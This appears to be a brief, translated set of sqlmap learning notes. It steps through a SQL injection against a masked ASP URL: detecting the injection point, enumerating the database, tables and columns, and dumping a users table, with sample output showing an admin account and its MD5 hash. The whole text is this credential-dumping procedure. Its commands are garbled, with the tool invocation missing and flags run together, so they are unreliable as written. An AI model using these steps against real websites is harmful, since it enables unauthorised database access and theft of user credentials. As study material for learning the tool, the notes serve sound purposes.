1. Determine if a URL has an injection point:
" http://abcd****efg.asp?id=7 "
Suppose the database is found: Student
-- ---------------------------- Available Databases[1] [*]-- ----------------------------
2. Get the table name in the database:
" http://abcd****efg.asp?id=7 " -D student--tables
Suppose you find the table name: Users
-- --------------------- [INFO] retrieved:users -- ---------------------
3. Get the name of the field in the table:
" http://abcd****efg.asp?id=7 " -D student-t users--columns
Suppose you get the field: ID username password
--------------------------------- [INFO]Retrieved:id[INFO]Retrieved:int(3) [INFO]Retrieved:username[INFO]Retrieved:varchar( -) [INFO]Retrieved:password[INFO]Retrieved:varchar( -)----------------------------------
4. Guess the contents of the field:
" http://abcd****efg.asp?id=7 " -D student-t users-c Id,username,password--dump
Get results:
[info] retrieved: 1 [info] retrieved: admin [INFO] retrieved: 21232F297A57A5A743894A0E4A801FC3 (32-bit MD5 encryption)
Account: admin Password: Decrypt the cipher.
MySQL injection of 2.sqlmap learning notes